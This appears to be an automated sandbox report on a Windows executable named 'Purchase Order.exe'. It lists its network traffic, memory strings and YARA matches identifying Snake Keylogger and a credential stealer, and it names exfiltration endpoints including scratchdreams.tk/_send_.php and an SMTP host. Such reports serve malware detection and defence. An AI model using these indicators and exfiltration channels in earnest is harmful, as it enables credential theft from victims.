Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.9:49712 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: checkip.dyndns.org

Source: Purchase Order.exe, 00000008.00000002.3808084232.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000030C7000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.0000000003019000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: Purchase Order.exe, 00000008.00000002.3808084232.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000030E2000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000030C7000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.000000000300D000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.0000000003019000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.0000000003111000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.000000000305C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Purchase Order.exe, 00000008.00000002.3808084232.0000000002F51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Purchase Order.exe, 00000003.00000002.1413538871.00000000036BE000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3800315530.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: Purchase Order.exe, 00000008.00000002.3808084232.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000030C7000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.0000000003031000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: Purchase Order.exe, 00000008.00000002.3808084232.0000000002F51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Purchase Order.exe, 00000008.00000002.3808084232.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://scratchdreams.tk
Source: Purchase Order.exe, 00000008.00000002.3808084232.0000000003232000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: Purchase Order.exe, 00000008.00000002.3811063229.0000000006750000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.cJ
Source: Purchase Order.exe, 00000008.00000002.3808084232.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000030C7000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.0000000003019000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.0000000003111000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.000000000305C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Purchase Order.exe, 00000003.00000002.1413538871.00000000036BE000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.0000000003019000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3800315530.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Purchase Order.exe, 00000008.00000002.3808084232.000000000305C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/102.129.152.231
Source: Purchase Order.exe, 00000008.00000002.3808084232.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000030C7000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.0000000003111000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.000000000305C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/102.129.152.231$
Source: Purchase Order.exe, 00000003.00000002.1413538871.00000000036BE000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3800315530.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scratchdreams.tk
Source: Purchase Order.exe, 00000008.00000002.3808084232.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scratchdreams.tk/_send_.php?TS

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown

HTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.9:49728 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.Purchase Order.exe.378b300.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.Purchase Order.exe.378b300.9.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.Purchase Order.exe.378b300.9.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.Purchase Order.exe.378b300.9.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 8.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 3.2.Purchase Order.exe.37abb20.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.Purchase Order.exe.37abb20.7.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.Purchase Order.exe.37abb20.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.Purchase Order.exe.37abb20.7.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 3.2.Purchase Order.exe.37abb20.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.Purchase Order.exe.37abb20.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.Purchase Order.exe.37abb20.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 3.2.Purchase Order.exe.378b300.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.Purchase Order.exe.378b300.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.Purchase Order.exe.378b300.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000008.00000002.3800315530.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000008.00000002.3800315530.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000003.00000002.1413538871.00000000036BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000003.00000002.1413538871.00000000036BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: Purchase Order.exe PID: 7192, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Purchase Order.exe PID: 7192, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: Purchase Order.exe PID: 7692, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Purchase Order.exe PID: 7692, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Purchase Order.exe

Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_0239E014	3_2_0239E014
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_069063E4	3_2_069063E4
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_069063E8	3_2_069063E8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06908300	3_2_06908300
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06907EB8	3_2_06907EB8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06907EC8	3_2_06907EC8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_01526168	8_2_01526168
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_0152C1F0	8_2_0152C1F0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_0152B388	8_2_0152B388
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_0152C4D0	8_2_0152C4D0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_0152C7B2	8_2_0152C7B2
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_015268E0	8_2_015268E0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_015298B8	8_2_015298B8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_01524B31	8_2_01524B31
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_0152FA10	8_2_0152FA10
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_0152CA92	8_2_0152CA92
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_0152EDF0	8_2_0152EDF0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_0152BC32	8_2_0152BC32
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_0152BF10	8_2_0152BF10
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_015221A8	8_2_015221A8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_0152E310	8_2_0152E310
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_0152E300	8_2_0152E300
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_0152B552	8_2_0152B552
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_015298B8	8_2_015298B8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A9BD38	8_2_05A9BD38
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A9A408	8_2_05A9A408
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A9B6E8	8_2_05A9B6E8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A98608	8_2_05A98608
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A9D670	8_2_05A9D670
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A9C9D8	8_2_05A9C9D8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A9B0A0	8_2_05A9B0A0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A9D028	8_2_05A9D028
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A9C388	8_2_05A9C388
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A98B58	8_2_05A98B58
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A9AA58	8_2_05A9AA58
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A985F8	8_2_05A985F8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A9BD28	8_2_05A9BD28
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A90D39	8_2_05A90D39
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A90D48	8_2_05A90D48
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A97D48	8_2_05A97D48
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A97D58	8_2_05A97D58
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A974A8	8_2_05A974A8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A90488	8_2_05A90488
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A90498	8_2_05A90498
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A97497	8_2_05A97497
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A94430	8_2_05A94430
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A93730	8_2_05A93730
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A96768	8_2_05A96768
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A96778	8_2_05A96778
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A95EB8	8_2_05A95EB8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A95EC8	8_2_05A95EC8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A9B6D8	8_2_05A9B6D8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A9560B	8_2_05A9560B
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A95618	8_2_05A95618
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A9D661	8_2_05A9D661
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A911A0	8_2_05A911A0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A981A0	8_2_05A981A0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A981B0	8_2_05A981B0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A9518B	8_2_05A9518B
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A95198	8_2_05A95198
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A9C9C8	8_2_05A9C9C8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A97900	8_2_05A97900
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A928B0	8_2_05A928B0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A9B090	8_2_05A9B090
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A908E0	8_2_05A908E0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A908F0	8_2_05A908F0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A978F0	8_2_05A978F0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A92809	8_2_05A92809
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A92807	8_2_05A92807
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A90006	8_2_05A90006
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A9D018	8_2_05A9D018
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A90040	8_2_05A90040
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A97040	8_2_05A97040
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A97050	8_2_05A97050
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A933A8	8_2_05A933A8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A933B8	8_2_05A933B8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A9A3FA	8_2_05A9A3FA
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A96BC1	8_2_05A96BC1
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A96BD0	8_2_05A96BD0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A96320	8_2_05A96320
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A96313	8_2_05A96313
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A9C378	8_2_05A9C378
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A9F2A0	8_2_05A9F2A0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A9F237	8_2_05A9F237
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A95A60	8_2_05A95A60
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A95A70	8_2_05A95A70
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_05A9AA4F	8_2_05A9AA4F

Source: Purchase Order.exe, 00000003.00000000.1343161103.000000000020E000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFRZs.exe@ vs Purchase Order.exe
Source: Purchase Order.exe, 00000003.00000002.1413538871.00000000036BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Purchase Order.exe
Source: Purchase Order.exe, 00000003.00000002.1413538871.00000000036BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Purchase Order.exe
Source: Purchase Order.exe, 00000003.00000002.1415784664.0000000008380000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Purchase Order.exe
Source: Purchase Order.exe, 00000003.00000002.1411062432.00000000007CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Purchase Order.exe
Source: Purchase Order.exe, 00000003.00000002.1412901774.000000000253F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Purchase Order.exe
Source: Purchase Order.exe, 00000008.00000002.3800522199.0000000000F87000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Purchase Order.exe
Source: Purchase Order.exe, 00000008.00000002.3800315530.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Purchase Order.exe
Source: Purchase Order.exe, 00000008.00000002.3804292957.00000000010C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Purchase Order.exe
Source: Purchase Order.exe	Binary or memory string: OriginalFilenameFRZs.exe@ vs Purchase Order.exe

Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: rasman.dll	Jump to behavior
